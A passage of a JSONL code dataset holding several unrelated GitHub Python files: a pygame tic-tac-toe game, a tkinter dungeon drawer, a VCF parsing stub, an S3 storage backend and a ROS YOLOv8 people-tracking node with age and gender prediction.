and (ttt[0][2] is not None):\r\n # game won diagonally right to left\r\n winner = ttt[0][2]\r\n pygame.draw.line(screen, (250, 70, 70), (350, 50), (50, 350), 4)\r\n if all([all(row) for row in ttt]) and winner is None:\r\n draw = True\r\n status()\r\n\r\n\r\ndef reset():\r\n global ttt, winner, draw, xo\r\n time.sleep(3)\r\n xo = 'x'\r\n winner = None\r\n draw = False\r\n home_screen()\r\n ttt = [[None] * 3, [None] * 3, [None] * 3]\r\n\r\n\r\ndef draw_xo(row, col):\r\n global ttt, xo, posx, posy\r\n if row == 1:\r\n posy = 30\r\n if row == 2:\r\n posy = width / 3 + 30\r\n if row == 3:\r\n posy = width / 3 * 2 + 30\r\n if col == 1:\r\n posx = 30\r\n if col == 2:\r\n posx = height / 3 + 30\r\n if col == 3:\r\n posx = height / 3 * 2 + 30\r\n ttt[row - 1][col - 1] = xo\r\n if xo == 'x':\r\n screen.blit(x_img, (posx, posy))\r\n xo = '0'\r\n else:\r\n screen.blit(o_img, (posx, posy))\r\n xo = 'x'\r\n pygame.display.update()\r\n\r\n\r\ndef user_click():\r\n x, y = pygame.mouse.get_pos()\r\n if x < width / 3:\r\n col = 1\r\n print('h')\r\n elif x < (width / 3) * 2:\r\n col = 2\r\n elif x < width:\r\n col = 3\r\n else:\r\n col = None\r\n if y < height / 3:\r\n row = 1\r\n elif y < (height / 3) * 2:\r\n row = 2\r\n elif y < height:\r\n row = 3\r\n else:\r\n row = None\r\n if row and col and ttt[row - 1][col - 1] is None:\r\n global xo\r\n # draw the x or o on screen\r\n draw_xo(row, col)\r\n check_win()\r\n\r\n\r\ndef user_click_single():\r\n x, y = pygame.mouse.get_pos()\r\n col = 0\r\n if x < width / 3:\r\n col = 1\r\n elif x < (width / 3) * 2:\r\n col = 2\r\n elif x < width:\r\n col = 3\r\n else:\r\n col = None\r\n if y < height / 3:\r\n row = 1\r\n elif y < (height / 3) * 2:\r\n row = 2\r\n elif y < height:\r\n row = 3\r\n else:\r\n row = None\r\n if row and col and ttt[row - 1][col - 1] is None:\r\n global xo\r\n # draw the x or o on screen\r\n draw_xo(row, col)\r\n check_win()\r\n a = random.randrange(1, 4)\r\n b = random.randrange(1, 4)\r\n while ttt[a - 1][b - 1] is not None:\r\n a = random.randrange(1, 4)\r\n b = random.randrange(1, 4)\r\n draw_xo(a, b)\r\n check_win()\r\n\r\n\r\nhome_screen()\r\n\r\nrun = True\r\nwhile run:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.type == 
pygame.MOUSEBUTTONDOWN:\r\n main_screen()\r\n x, y = pygame.mouse.get_pos()\r\n if y > 250:\r\n main_screen()\r\n while True:\r\n for e in pygame.event.get():\r\n if e.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n elif e.type == pygame.MOUSEBUTTONDOWN:\r\n user_click()\r\n if winner or draw:\r\n reset()\r\n pygame.display.update()\r\n clock.tick(fps)\r\n if y < 250:\r\n main_screen()\r\n while True:\r\n for f in pygame.event.get():\r\n if f.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n elif f.type == pygame.MOUSEBUTTONDOWN:\r\n user_click_single()\r\n if winner or draw:\r\n reset()\r\n\r\n pygame.display.update()\r\n clock.tick(fps)\r\n","repo_name":"sreshtha10/tictactoeGUI","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"}
+{"seq_id":"25401696152","text":"import random\nfrom tkinter import *\n\nclass Dungeon(object):\n def __init__(self, RoomWidth, RoomHeight):\n self.RoomWidth = RoomWidth\n self.RoomHeight = RoomHeight\n def Resolution(self):\n return \"resolution: %s,%s\" % (self.RoomWidth, self.RoomHeight)\n\nclass Window(object):\n def Create(width, height):\n WindowWidth = width\n WindowHeight = height\n BackGround = 'Khaki'\n _Window = Canvas(width = WindowWidth, height = WindowHeight, bg = BackGround)\n _Window.pack()\n return _Window\n\nif __name__ == \"__main__\":\n width = 600\n height = 600\n WorkSpace = Window.Create(width, height)\n\n \n Room = []\n for num in range(random.randint(10, 50)):\n Room.append(num)\n Room[num] = Dungeon(random.randint(5,50), random.randint(5,50))\n print(\"Room #%s, %s\" % (num, Room[num].Resolution()))\n WorkSpace.create_rectangle(width/2-Room[num].RoomWidth, height/2-Room[num].RoomHeight,\n width/2+Room[num].RoomWidth, height/2+Room[num].RoomHeight,\n outline = 'Blue')\n","repo_name":"ShakulaAndrew/DungeonMaker","sub_path":"DungeonMaker.py","file_name":"DungeonMaker.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"21115329101","text":"#Input : $python mutantSeq.py <vcf file> <ENSTtoAA.py output file>\n### ENSTtoAA.py output == per/line : <ENST ID>;<field>;<field>;...\n\n#Output for each VCF line\n### <chromosome>:<position>\n\n\nimport sys\n\n##call in the VCF file\nvcfFile = sys.argv[1] ## VCF File\nenstFile = sys.argv[2] ## ENSTtoAA.py outputfile\n\nwith open(vcfFile,'r') as i:\n entries = i.readlines()\n\nwith open(enstFile,'r') as i:\n lines = i.readlines()\n\nparsedVCF = []\nfor i in entries:\n if i[0] != '#':\n parsedVCF.append(i)\n\n## Convert the ENSTtoAA.py output to a dictionary with the KEY == ENST ID\nenstDict = {}\nfor i in lines:\n units = i.split(';')\n enstDict[units[0]] = units[1:]\n\nsnpDict = {}\nfor i in parsedVCF:\n info = i.split('\\t')\n newkey = info[0] + ':' + info[1]\n snpDict[newkey] = info[5] ### DICT {<chrom:pos> : <quality>}\n\n### Goal : go through each KEY of the dictionary and find the SNPs with corresponding chromosome and location of the CDS regions\n\nfor snp in snpDict:\n print(snp)\n\n\n\n","repo_name":"yuq1993/IBP-SNPeffect","sub_path":"Scripts_Colton/mutantSeq.py","file_name":"mutantSeq.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"17090241756","text":"import logging\nimport posixpath\nfrom urllib.parse import urlparse\n\nimport boto3\nfrom botocore.client import Config\n\nfrom .base import 
BaseStorage\nfrom .types import FileInfo, FileMetadata, PresignedPostInfo, S3Object\n\nlogger = logging.getLogger(__name__)\n\n\n_config = None\n\n\ndef get_aws_session() -> boto3.Session:\n return boto3.Session()\n\n\ndef get_s3_public_file_url(region: str, bucket_name: str, path: str) -> str:\n return 'https://{name}.s3-{region}.amazonaws.com/{path}'.format(\n region=region, name=bucket_name, path=path)\n\n\nclass S3Storage(BaseStorage):\n \"\"\"Amazon S3 backed storage\n\n This is the recommended choice for production.\n \"\"\"\n\n def __init__(self, bucket_name: str, key_prefix: str = None) -> None:\n self.bucket_name = bucket_name\n self.key_prefix = key_prefix or ''\n\n @classmethod\n def from_url(cls, url): # type: (str) -> BaseStorage\n parsed = urlparse(url)\n if not parsed.netloc:\n raise ValueError(\n 'S3 bucket name missing. '\n 'Make sure the URL is in the form s3://bucket-name/key-prefix')\n return cls(parsed.netloc, key_prefix=parsed.path.lstrip('/'))\n\n def get_file(self, key: str) -> FileInfo:\n full_key = self._get_full_key(key)\n data = self._get_bucket().Object(full_key).get()\n return FileInfo(\n metadata=FileMetadata(\n content_type=data['ContentType']),\n content=data['Body'])\n\n def get_file_meta(self, key: str) -> FileMetadata:\n return self.get_file(key).metadata\n\n def get_file_content(self, key: str) -> bytes:\n return self.get_file(key).content\n\n def get_presigned_post(self, key: str, content_type: str) \\\n -> PresignedPostInfo:\n full_key = self._get_full_key(key)\n\n # s3 = get_aws_session().resource('s3')\n aws = get_aws_session()\n s3 = aws.client('s3', config=Config(signature_version='s3v4'))\n\n presigned_post = s3.generate_presigned_post(\n Bucket=self.bucket_name,\n Key=full_key,\n Fields={\"Content-Type\": content_type},\n Conditions=[\n # TODO: limit file size here\n {\"Content-Type\": content_type}\n ],\n ExpiresIn=3600)\n return PresignedPostInfo(\n url=presigned_post['url'],\n fields=presigned_post['fields'])\n\n def _get_bucket(self):\n aws = get_aws_session()\n s3 = aws.resource('s3')\n return s3.Bucket(self.bucket_name)\n\n def _get_full_key(self, key: str) -> str:\n return posixpath.join(self.key_prefix, key)\n\n def _get_object(self, key: str) -> S3Object:\n full_key = self._get_full_key(key)\n return self._get_bucket().Object(full_key)\n\n def put_file(self, key: str, data: bytes, mime_type: str = None) -> None:\n self._get_object(key).put(Body=data, ContentType=mime_type)\n\n def get_file_url(self, key: str) -> str:\n full_key = self._get_full_key(key)\n return ('s3://{bucket}/{key}'\n .format(bucket=self.bucket_name, key=full_key))\n\n def file_exists(self, key: str) -> bool:\n from botocore.exceptions import ClientError\n\n aws = get_aws_session()\n s3_client = aws.client('s3')\n try:\n s3_client.head_object(\n Bucket=self.bucket_name,\n Key=self._get_full_key(key))\n except ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n return False\n raise\n return True\n\n def get_etag(self, key: str) -> str:\n return self._get_object(key).e_tag\n","repo_name":"rshk/mowaki-py","sub_path":"mowaki/storage/storage_s3.py","file_name":"storage_s3.py","file_ext":"py","file_size_in_byte":3663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"11332172942","text":"#!/usr/bin/env python3\nimport rospy\nimport math\nimport sys\nimport os\nfrom yolov8_data.msg import Object, ObjectsMSG\nfrom yolov8_data.srv import *\nfrom sensor_msgs.msg import Image as msg_Image\nfrom 
sensor_msgs.msg import CameraInfo as msg_CameraInfo\nfrom sensor_msgs.msg import CompressedImage as msg_CompressedImage\nfrom sensor_msgs.msg import PointCloud2 as msg_PointCloud2\nfrom geometry_msgs.msg import *\nfrom nav_msgs.msg import *\nimport numpy as np\nimport cv2\nimport queue\nimport yaml\nfrom PIL import Image\nimport torch\nimport copy\nimport gc\nfrom signal import signal, SIGINT\n\nimport lap\nfrom cython_bbox import bbox_overlaps as bbox_ious\n\ntorch.cuda.empty_cache() \nos.environ[\"PYTORCH_CUDA_ALLOC_CONF\"] = \"garbage_collection_threshold:0.6,max_split_size_mb:128\"\n\nsys.path.append('/home/robolab/software/JointBDOE')\nfrom utils.torch_utils import select_device\nfrom utils.general import check_img_size, scale_coords, non_max_suppression\nfrom utils.datasets import LoadImages\nfrom models.experimental import attempt_load\nfrom utils.augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective\nfrom ultralytics import YOLO\n\nimport time\nimport tf\nimport message_filters\nimport torch\n\nsys.path.append('/home/robolab/software/BOSCH-Age-and-Gender-Prediction/models')\nfrom base_block import FeatClassifier, BaseClassifier\nfrom resnet import resnet50\nfrom collections import OrderedDict\nimport torchvision.transforms as T\n\nclass yolov8():\n def __init__(self):\n self.image_queue = queue.Queue(1)\n self.objects_publisher = rospy.Publisher(\"/perceived_people\", ObjectsMSG, queue_size=10)\n self.objects_write = []\n self.objects_read = []\n self.camera_info = None\n\n self.depth_image = []\n self.color_image = []\n\n self.robot_world_transform_matrix = np.array([])\n self.robot_orientation = None\n self.camera_pose_respect_robot = np.array([[1, 0, 0, 0.21331892690256105],\n [0, 1, 0, 0.004864029093594846],\n [0, 0, 1, -0.9769708264898666],\n [0, 0, 0, 1]])\n\n\n self.age_range = [[10, 30], [30, 45], [45, 50], [50, 70]]\n normalize = T.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n self.valid_tsfm = T.Compose([\n T.Resize((256, 192)),\n T.ToTensor(),\n normalize\n ])\n backbone = resnet50()\n classifier = BaseClassifier(nattr=35)\n self.age_classification_model = FeatClassifier(backbone, classifier)\n\n if torch.cuda.is_available():\n self.age_classification_model = torch.nn.DataParallel(self.age_classification_model).cuda()\n else:\n print(\"AGE CLASSIFICATION MODEL CAN'T BE EXECUTED WITH CUDA\")\n\n self.load_age_predictor_state_dict(self.age_classification_model)\n\n self.width = 640\n self.height = 480\n\n self.color_depth_ratio = None\n self.color_yolo_ratio_height = None\n self.color_yolo_ratio_width = None\n\n self.new_data = False\n\n # self.yolo_model_name = 'yolov8m-seg.pt'\n self.yolo_model_name = 'yolov8n-pose.engine'\n\n self.model_v8 = YOLO(self.yolo_model_name)\n\n self.device = select_device(\"0\", batch_size=1)\n self.model = attempt_load(\"/home/robolab/software/JointBDOE/runs/JointBDOE/coco_s_1024_e500_t020_w005/weights/best.pt\", map_location=self.device)\n self.stride = int(self.model.stride.max())\n with open(\"/home/robolab/software/JointBDOE/data/JointBDOE_weaklabel_coco.yaml\") as f:\n self.data = yaml.safe_load(f) # load data dict\n \n################# SUBSCRIBER CALLBACKS #################\n\n def store_data(self, rgb, depth, odom):\n # print(\"STORING DATA\")\n self.color_image = cv2.cvtColor(np.frombuffer(rgb.data, np.uint8).reshape(rgb.height, rgb.width, 4), cv2.COLOR_RGBA2RGB )\n self.depth_image = np.frombuffer(depth.data, np.float32).reshape(depth.height, depth.width, 1)\n\n 
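# extract the yaw from the odometry quaternion and build the robot->world\n # homogeneous transform: a rotation about z by that yaw plus the x/y/z\n # translation from the odometry position\n 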
euler_rotation = tf.transformations.euler_from_quaternion([odom.pose.pose.orientation.x, odom.pose.pose.orientation.y, odom.pose.pose.orientation.z, odom.pose.pose.orientation.w])\n self.robot_orientation = euler_rotation[2]\n self.robot_world_transform_matrix = np.array([[math.cos(euler_rotation[2]), -math.sin(euler_rotation[2]), 0, odom.pose.pose.position.x],\n [math.sin(euler_rotation[2]), math.cos(euler_rotation[2]), 0, odom.pose.pose.position.y],\n [0, 0, 1, odom.pose.pose.position.z],\n [0, 0, 0, 1]])\n self.new_data = True\n \n################# DATA OBTAINING #################\n\n def get_people_data(self, img, depth, robot_trans_matrix, robot_orientation):\n img0 = copy.deepcopy(img)\n img = letterbox(img, 640, stride=self.stride, auto=True)[0]\n img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB\n img = np.ascontiguousarray(img)\n img = torch.from_numpy(img).to(self.device)\n img = img / 255.0 # 0 - 255 to 0.0 - 1.0\n \n if len(img.shape) == 3:\n img = img[None] # expand for batch dim\n\n # Make inference with both models\n init = time.time()\n out_ori = self.model(img, augment=True, scales=[1])[0]\n out_v8 = self.model_v8.predict(img0, classes=0, show_conf=True)\n print(\"EXPENDED TimE:\", time.time() - init)\n # # YOLO V8 data processing\n # if \"pose\" in self.yolo_model_name:\n # bboxes, confidences, poses = self.get_pose_data(out_v8, depth, robot_trans_matrix, img0)\n # else:\n # bboxes, confidences, poses = self.get_segmentator_data(out_v8, depth, robot_trans_matrix)\n\n # # Orientation model data processing\n\n # out = non_max_suppression(out_ori, 0.3, 0.5, num_angles=self.data['num_angles'])\n # orientation_bboxes = scale_coords(img.shape[2:], out[0][:, :4], img0.shape[:2]).cpu().numpy().astype(int) # native-space pred\n # orientations = (out[0][:, 6:].cpu().numpy() * 360) - 180 # N*1, (0,1)*360 --> (0,360)\n \n # # Hungarian algorithm for matching people from segmentation model and orientation model\n\n # matches = self.associate_orientation_with_segmentation(orientation_bboxes, bboxes)\n\n # # aux_objects_write = []\n # # for match in matches:\n # # act_object = Object()\n # # act_object.type = 0\n # # act_object.left = int(segmentation_bboxes[match[1]][0])\n # # act_object.top = int(segmentation_bboxes[match[1]][1])\n # # act_object.right = int(segmentation_bboxes[match[1]][2])\n # # act_object.bot = int(segmentation_bboxes[match[1]][3])\n # # act_object.score = segmentation_confidences[match[1]]\n # # act_object.orientation = orientations[match[0]]\n # # aux_objects_write.append(act_object)\n # # bytetrack_srv_proxy = rospy.ServiceProxy('bytetrack_srv', ObjectsSRV)\n # # try:\n # # aux_objects_read = bytetrack_srv_proxy(aux_objects_write).res\n # # except rospy.ServiceException as e:\n # # print(\"Service call failed: %s\"%e)\n # # ret_bboxes = [[person.left if person.left > 0 else 0, person.top if person.top > 0 else 0, person.right if person.right < self.width else self.width - 1, person.bot if person.bot < self.height else self.height - 1] for person in aux_objects_read]\n # # ret_scores = [person.score for person in aux_objects_read]\n # # ret_orientations = [person.orientation for person in aux_objects_read]\n\n # associated_orientations = []\n # for i in range(len(matches)):\n # for j in range(len(matches)):\n # if i == matches[j][1]:\n # transformed_pose = tf.transformations.quaternion_from_euler(0, 0, math.radians(orientations[matches[j][0]][0]) - math.pi) \n # transformed_pose_quaternion = Quaternion(x=transformed_pose[0], y=transformed_pose[1], 
z=transformed_pose[2], w=transformed_pose[3])\n # # associated_orientations.append(transformed_pose_quaternion)\n # associated_orientations.append(self.transform_orientation_to_world_reference(math.radians(orientations[matches[j][0]][0]), robot_orientation))\n # break\n\n # if len(bboxes) == 0:\n # return [], [], [], []\n # # ret_orientations = [orientations[match[]] for match in matches]\n\n # return bboxes, confidences, associated_orientations, poses\n # return segmentation_bboxes, segmentation_poses, segmentation_confidences\n\n def get_pose_data(self, result, depth_image, robot_trans_matrix, frame):\n pose_bboxes = []\n pose_poses = []\n pose_confidences = []\n for result in result:\n if result.keypoints != None and result.boxes != None:\n boxes = result.boxes\n keypoints = result.keypoints.xy.cpu().numpy().astype(int)\n if len(keypoints) == len(boxes):\n for i in range(len(keypoints)):\n person_bbox = boxes[i].xyxy.cpu().numpy().astype(int)[0] \n if len(keypoints[i]) > 0: \n x_avg = (keypoints[i][5, 0] + keypoints[i][6, 0]) / 2\n y_avg = (keypoints[i][5, 1] + keypoints[i][6, 1]) / 2\n if x_avg < 100 or x_avg > self.width - 100:\n continue\n neck_point = np.array([x_avg, y_avg]).astype(int)\n gender_pred, age_pred = self.get_pred_attributes(frame, person_bbox[0], person_bbox[1], person_bbox[2], person_bbox[3])\n person_pose = self.get_neck_distance(neck_point, depth_image, robot_trans_matrix)\n pose_poses.append(person_pose)\n pose_bboxes.append(person_bbox)\n pose_confidences.append(boxes[i].conf.cpu().numpy()[0]) \n return pose_bboxes, pose_confidences, pose_poses\n\n\n def get_neck_distance(self, neck_point, depth_image, robot_trans_matrix):\n neck_point[0] = neck_point[0] - 1 if neck_point[0] >= self.height else neck_point[0]\n neck_point[1] = neck_point[1] - 1 if neck_point[1] >= self.width else neck_point[1]\n if not np.isinf(depth_image[neck_point[1], neck_point[0]]):\n neck_point_3d = self.depth_point_to_xyz(neck_point, depth_image[neck_point[1], neck_point[0]])\n world_neck_point_3d = self.transform_pose_to_world_reference(neck_point_3d, robot_trans_matrix)\n return world_neck_point_3d\n else:\n return [np.inf, np.inf]\n\n def get_segmentator_data(self, result, depth_image, robot_trans_matrix):\n segmentation_bboxes = []\n segmentation_poses = []\n segmentation_confidences = []\n for result in result:\n if result.masks != None and result.boxes != None:\n masks = result.masks.xy\n boxes = result.boxes\n if len(masks) == len(boxes):\n for i in range(len(boxes)):\n person_bbox = boxes[i].xyxy.cpu().numpy().astype(int)[0]\n segmentation_bboxes.append(person_bbox)\n segmentation_confidences.append(boxes[i].conf.cpu().numpy()[0])\n person_pose = self.get_mask_distance(masks[i], depth_image, robot_trans_matrix)\n segmentation_poses.append(person_pose)\n return segmentation_bboxes, segmentation_confidences, segmentation_poses\n\n def get_mask_distance(self, mask, depth_image, robot_trans_matrix):\n valid_points = []\n for point in mask:\n x, y = int(point[0]), int(point[1])\n if not np.isinf(depth_image[y, x]):\n valid_points.append(self.depth_point_to_xyz(point, depth_image[y, x]))\n\n if valid_points:\n mean_point = np.mean(valid_points, axis=0)\n world_pose = self.transform_pose_to_world_reference(mean_point, robot_trans_matrix)\n return world_pose\n else:\n return [np.inf, np.inf]\n\n def associate_orientation_with_segmentation(self, seg_bboxes, ori_bboxes):\n dists = self.iou_distance(seg_bboxes, ori_bboxes)\n matches, unmatched_a, unmatched_b = self.linear_assignment(dists, 
0.9)\n # print(\"NO MATCHES A\", unmatched_a)\n # print(\"NO MATCHES b\", unmatched_b)\n # print(\"MATCHES\", matches)\n return matches\n\n def linear_assignment(self, cost_matrix, thresh):\n if cost_matrix.size == 0:\n return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1]))\n matches, unmatched_a, unmatched_b = [], [], []\n cost, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh)\n for ix, mx in enumerate(x):\n if mx >= 0:\n matches.append([ix, mx])\n unmatched_a = np.where(x < 0)[0]\n unmatched_b = np.where(y < 0)[0]\n matches = np.asarray(matches)\n return matches, unmatched_a, unmatched_b\n\n def iou_distance(self, atracks, btracks):\n if (len(atracks)>0 and isinstance(atracks[0], np.ndarray)) or (len(btracks) > 0 and isinstance(btracks[0], np.ndarray)):\n atlbrs = atracks\n btlbrs = btracks\n else:\n atlbrs = [track.tlbr for track in atracks]\n btlbrs = [track.tlbr for track in btracks]\n _ious = self.ious(atlbrs, btlbrs)\n cost_matrix = 1 - _ious\n\n return cost_matrix\n\n def ious(self, atlbrs, btlbrs):\n ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=float)\n if ious.size == 0:\n return ious\n\n ious = bbox_ious(\n np.ascontiguousarray(atlbrs, dtype=float),\n np.ascontiguousarray(btlbrs, dtype=float)\n )\n\n return ious\n\n # def get_people_pose(self, people_bboxes, depth_image):\n # radius = 5\n # color = (0, 0, 255) # Color en formato BGR (azul)\n # thickness = -1 # Relleno del círculo\n # people_poses = []\n # for person_bbox in people_bboxes:\n # cv2.rectangle(self.color_image, (int(person_bbox[0]), int(person_bbox[1])), (int(person_bbox[2]), int(person_bbox[3])), (255, 0, 0), 2)\n # x_range = int(person_bbox[0] + (person_bbox[2] - person_bbox[0]) / 2)\n # y_range = int(person_bbox[1] + (person_bbox[3] - person_bbox[1]) / 5)\n # # image_section = depth_image[int(person_bbox[3] / 5):int(person_bbox[3] / 4), x_range]\n # # print(image_section)\n # # # print(image_section)\n # # if image_section.size > 0: \n # # min_value = np.unravel_index(np.argmin(image_section), image_section.shape) \n # # else: \n # # continue\n\n # if math.isinf(depth_image[y_range][x_range]):\n # image_section = depth_image[y_range, int(person_bbox[0]):int(person_bbox[2])]\n # print(\"SECTION X\", int(person_bbox[2] / 4), int(person_bbox[2] * 3 / 4))\n # # print(image_section)\n # if image_section.size > 0: \n # print(image_section.shape)\n # min_value = np.unravel_index(np.argmin(image_section), image_section.shape) \n # if not math.isinf(depth_image[y_range][min_value[0]]): \n # print(\"Min value:\", min_value)\n # from_robot_pose = self.depth_point_to_xyz([min_value[0] + person_bbox[0], y_range], depth_image[y_range][min_value[0] + person_bbox[0]])\n # cv2.circle(self.color_image, (min_value[0] + person_bbox[0], y_range), radius, color, thickness)\n # else:\n # print(\"PROJECTED POINT:\", x_range, person_bbox[3])\n # cv2.circle(self.color_image, (x_range, person_bbox[3]), radius, color, thickness)\n # from_robot_pose = self.calculate_depth_with_projection([x_range, person_bbox[3]])\n # else: \n # print(\"PROJECTED POINT:\", x_range, person_bbox[3])\n # cv2.circle(self.color_image, (x_range, person_bbox[3]), radius, color, thickness)\n # from_robot_pose = self.calculate_depth_with_projection([x_range, person_bbox[3]])\n # else:\n # print(\"DEPTH POINT:\", x_range, y_range)\n # cv2.circle(self.color_image, (x_range, y_range), radius, color, thickness)\n # from_robot_pose = self.depth_point_to_xyz([x_range, y_range], 
depth_image[y_range][x_range])\n # world_person_pose = self.transform_pose_to_world_reference(from_robot_pose)\n # people_poses.append(world_person_pose)\n # return people_poses\n \n def get_yolo_objects(self, event):\n if self.new_data:\n depth_image = self.depth_image\n color_image = self.color_image\n robot_trans_matrix = self.robot_world_transform_matrix\n robot_orientation = self.robot_orientation\n self.get_people_data(color_image, depth_image, robot_trans_matrix, robot_orientation)\n # bboxes, scores, orientations, poses = self.get_people_data(color_image, depth_image, robot_trans_matrix, robot_orientation)\n # self.create_interface_data(bboxes, orientations, poses, scores)\n # self.new_data = False\n\n################# DATA STRUCTURATION #################\n\n def create_interface_data(self, boxes, orientations, centers, scores):\n objects = ObjectsMSG()\n objects.header.stamp = rospy.Time.now()\n print(\"EEE\")\n if len(boxes) == len(orientations) == len(centers) == len(scores):\n for index in range(len(boxes)):\n act_object = Object()\n act_object.type = 0\n act_object.left = boxes[index][0]\n act_object.top = boxes[index][1]\n act_object.right = boxes[index][2]\n act_object.bot = boxes[index][3]\n act_object.score = scores[index]\n # bbx_center_depth = [int((act_object.left + (act_object.right - act_object.left)/2)), int((act_object.top + (act_object.bot - act_object.top)/2))]\n act_object.pose = Pose()\n act_object.pose.position.x = centers[index][0] \n act_object.pose.position.y = centers[index][1]\n\n act_object.pose.orientation = orientations[index]\n act_object.image = self.get_bbox_image_data(self.color_image, [act_object.left, act_object.top, act_object.right, act_object.bot])\n \n objects.objectsmsg.append(act_object)\n print(len(objects.objectsmsg))\n self.objects_publisher.publish(objects)\n\n def get_bbox_image_data(self, image, element_box):\n cropped_image = image[int(element_box[1]):int(element_box[3]), int(element_box[0]):int(element_box[2])]\n y, x, _ = cropped_image.shape\n return msg_Image(data=cropped_image.tobytes(), height=y, width=x)\n\n################# TO WORLD TRANSFORMATIONS #################\n\n def transform_pose_to_world_reference(self, person_pose, robot_trans_matrix):\n # print(person_pose)\n # person_world_position = np.dot(self.camera_pose_respect_robot, np.dot(robot_trans_matrix, np.array([person_pose[0], -person_pose[1], 0, 1])))\n person_world_position = np.dot(robot_trans_matrix, np.array([person_pose[0], -person_pose[1], 0, 1]))\n\n return [round(person_world_position[0], 3), round(person_world_position[1], 3)]\n \n def transform_orientation_to_world_reference(self, orientation, robot_orientation):\n theta_world = robot_orientation + orientation\n transformed_pose = tf.transformations.quaternion_from_euler(0, 0, -((math.pi)-np.arctan2(np.sin(theta_world), np.cos(theta_world)))) \n return Quaternion(x=transformed_pose[0], y=transformed_pose[1], z=transformed_pose[2], w=transformed_pose[3])\n\n################# IMAGE POINTS TO DEPTH #################\n\n def depth_point_to_xyz(self, pixel, depth):\n # angle_y = ((math.pi - 1.01)/2) + (pixel[1]*1.01/480)\n # angle_z = ((2*math.pi) - 0.785/2) + (pixel[0]*0.785/640)\n angle_y = ((math.pi - 0.785)/2) + (pixel[1]*0.785/480)\n angle_z = ((2*math.pi) - 1.01/2) + (pixel[0]*1.01/640)\n y_distance = depth / math.tan(angle_y)\n z_distance = depth * math.tan(angle_z)\n return depth[0], z_distance[0], y_distance[0]\n \n def calculate_depth_with_projection(self, projected_point):\n world_y = 579.65506 * 1.2 
/ (projected_point[1] - 243.0783)\n world_x = world_y * (projected_point[0] - 317.47191) / 577.55158\n return [world_y, world_x]\n \n################# PERSON ATTRIBUTES #################\n\n\n\n def get_pred_attributes(self, frame, x1, y1, x2, y2):\n img = frame[y1:y2, x1:x2]\n img = Image.fromarray(img)\n img = self.valid_tsfm(img)\n valid_logits = self.age_classification_model(img.unsqueeze(0))\n valid_probs = torch.sigmoid(valid_logits)\n \n age_pred = self.age_range[torch.argmax(valid_probs[0][0:-1])]\n gender_pred = \"M\" if valid_probs[0][-1] > 0.5 else \"F\"\n\n return gender_pred, age_pred\n\n def load_age_predictor_state_dict(self, model):\n\n PATH_TO_AGE_GENDER_PREDICTOR_CHECKPOINT = '/home/robolab/software/BOSCH-Age-and-Gender-Prediction/exp_result/PETA/PETA/img_model/ckpt_max.pth'\n\n loaded = torch.load(PATH_TO_AGE_GENDER_PREDICTOR_CHECKPOINT, map_location=torch.device(\"cuda:0\"))\n\n if not torch.cuda.is_available():\n # remove `module.`\n new_state_dict = OrderedDict()\n for k, v in loaded['state_dicts'].items():\n name = k[7:] \n new_state_dict[name] = v\n\n # load parameters\n model.load_state_dict(new_state_dict, strict=False)\n else: \n model.load_state_dict(loaded['state_dicts'], strict=False)\n \n print(\"Load successful\")\n model = model.eval()\n\n\n\n\ndef handler(signal_received, frame):\n # Handle any cleanup here\n print('SIGINT or CTRL-C detected. Exiting gracefully')\n gc.collect()\n torch.cuda.empty_cache()\n exit(0)\n\n################# MAIN #################\n\nif __name__ == '__main__':\n rospy.init_node(\"yolov8\")\n rospy.loginfo(\"yolov8 node has been started\")\n\n signal(SIGINT, handler)\n\n yolo = yolov8()\n # rospy.wait_for_service('bytetrack_srv')\n\n rgb_subscriber = message_filters.Subscriber(\"/xtion/rgb/image_raw\", msg_Image)\n depth_subscriber = message_filters.Subscriber(\"/xtion/depth/image_raw\", msg_Image)\n odom_subscriber = message_filters.Subscriber(\"/camera_odom\", Odometry)\n \n ts = message_filters.TimeSynchronizer([rgb_subscriber, depth_subscriber, odom_subscriber], 5)\n ts.registerCallback(yolo.store_data)\n rospy.Timer(rospy.Duration(0.033), yolo.get_yolo_objects)\n rospy.spin()\n\n # rospy.logwarn(\"Warning test message\")\n # rospy.logerr(\"Error test message\")\n # rospy.loginfo(\"End of program\")\n","repo_name":"GeraGrind96/ROS_people_tracking","sub_path":"yolov8/scripts/complete_pose.py","file_name":"complete_pose.py","file_ext":"py","file_size_in_byte":23431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70228591922","text":"# Python Version: 3.x\n\"\"\"\n.. py:data:: services\n\n :type: :py:class:`List` [ :py:class:`Type` [ :py:class:`onlinejudge.type.Service` ] ]\n\n contains classes to use for :py:func:`service_from_url`\n\n.. py:data:: problems\n\n :type: :py:class:`List` [ :py:class:`Type` [ :py:class:`onlinejudge.type.Problem` ] ]\n\n contains classes to use for :py:func:`problem_from_url`\n\n.. 
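# --- Illustrative aside (not part of the dataset record above) ---
# calculate_depth_with_projection in complete_pose.py hard-codes pinhole
# intrinsics (fx ~= 577.55158, fy ~= 579.65506, cx ~= 317.47191,
# cy ~= 243.0783, i.e. an Xtion-like 640x480 camera). A minimal, hedged
# sketch of the general pixel -> camera-frame back-projection those
# constants imply, assuming a metric depth value is known for the pixel:
import numpy as np

FX, FY = 577.55158, 579.65506  # focal lengths in pixels (from the file above)
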